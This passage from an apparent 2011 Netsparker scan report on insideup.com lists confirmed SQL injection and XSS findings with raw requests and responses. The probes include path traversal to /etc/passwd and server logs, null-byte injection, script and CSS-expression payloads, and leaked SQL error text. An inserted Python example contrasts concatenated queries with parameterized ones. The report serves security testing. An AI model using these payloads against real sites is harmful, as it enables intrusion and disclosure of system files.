OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e7d54ngr10s80iap8kffl4rei3; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php'"--></style></script><script>netsparker(0x0009C4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0009C4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php?'"--></style></script><script>alert(0x0009D1..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0009D1)</script>

Request

GET /ppc/leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hbbsnf6umun53i2n01aophbd43; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?'"--></style></script><script>netsparker(0x0009D1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0009D1)</script>/' union select prj.catI' at line 5
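The statement echoed in each project.php response compares prj.project_page_url with a string built from the request URI, path and query string included (the scanner's invented nsextt parameter sits inside the literal), and repeats that string twice per table, once bare and once with a trailing slash, across five UNIONed SELECTs. That is why injecting into the path, into a bare query string, or into catId all break the same query. The Python below is an added example and not code from the report or from the insideup.com application: it rebuilds two of the five tables in an in-memory SQLite database (standing in for MySQL, so the exact error text differs), shows the concatenating builder failing on the scanner's probe, and shows the same statement with every occurrence of the URI bound as a parameter. The column list, seed rows and the REQUEST_URI-derived lookup key are assumptions drawn from the echoed SELECT.

```python
"""Vulnerable-versus-parameterized lookup for the page-URL query echoed above.

Added example, not code from the report or from the insideup.com application.
The schema is a two-table cut-down of the five lead_flow_*_pages_details tables
named in the echoed statement; columns and seed rows are assumptions.
"""
import sqlite3

# Table names come from a fixed tuple, never from the request.
TABLES = ("lead_flow_one_pages_details", "lead_flow_two_pages_details")

# The scanner probe, URL-decoded, as it reached the SQL layer in the report.
PROBE_URI = ("leadflow/cace00/project.php?catId='\"--></style></script>"
             "<script>netsparker(0x0009DD)</script>&iusrc=iupsc")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL tables, seeded with constructed rows."""
    conn = sqlite3.connect(":memory:")
    for table in TABLES:
        conn.execute(f"create table {table} (catId integer, groupId integer, "
                     f"templateId integer, project_page_url text)")
    conn.execute("insert into lead_flow_one_pages_details values (80007, 1, 3, "
                 "'leadflow/cace00/project.php?catId=80007&iusrc=iupsc')")
    conn.execute("insert into lead_flow_two_pages_details values (80006, 2, 4, "
                 "'leadflow/dima00/project.php?catId=80006&iusrc=iupsc')")
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, request_uri: str) -> list:
    """Mirrors the echoed statement: the URI is concatenated into each of the
    UNIONed SELECTs, twice per table (once bare, once with a trailing slash).
    A quote in the URI ends the literal and the rest is parsed as SQL."""
    parts = [
        f"select prj.catId, prj.groupId, prj.templateId, prj.project_page_url "
        f"from {t} prj where prj.project_page_url = '{request_uri}' "
        f"or prj.project_page_url = '{request_uri}/'"
        for t in TABLES
    ]
    return conn.execute(" union ".join(parts)).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, request_uri: str) -> list:
    """Same statement shape with every occurrence bound as a parameter; the
    probe is then just a string nobody has stored, so the result is empty."""
    parts = [
        f"select prj.catId, prj.groupId, prj.templateId, prj.project_page_url "
        f"from {t} prj where prj.project_page_url = ? "
        f"or prj.project_page_url = ?"
        for t in TABLES
    ]
    # One (uri, uri/) pair per table, in placeholder order.
    args = [v for _ in TABLES for v in (request_uri, request_uri + "/")]
    return conn.execute(" union ".join(parts), args).fetchall()


def demo() -> dict:
    """Run both lookups against a benign URI and the probe; returns a summary
    that a caller or test can assert on."""
    conn = make_db()
    benign = "leadflow/cace00/project.php?catId=80007&iusrc=iupsc"
    try:
        lookup_vulnerable(conn, PROBE_URI)
        vulnerable_errored = False
    except sqlite3.OperationalError:
        vulnerable_errored = True  # the concatenated statement no longer parses
    return {
        "benign_vulnerable": lookup_vulnerable(conn, benign),
        "benign_parameterized": lookup_parameterized(conn, benign),
        "probe_vulnerable_errored": vulnerable_errored,
        "probe_parameterized": lookup_parameterized(conn, PROBE_URI),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Binding the value does not by itself stop the error page from leaking the statement text; that needs the handler to stop printing the query and the driver's error message into the response, which is the other half of what the project.php bodies above show.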
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0009DD)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/cace00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009DD)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ddenv9f54698fpv98cdvgjt6r3; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union sel' at line 5
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST " stYle="x:expre/**/ssion(alert(9))
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=%22+stYle%3d%22x%3aexpre%2f**%2fssion(netsparker(9))+&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:34:58 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F0E7BA5CE2931945AD5C1200F5A06E46; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San 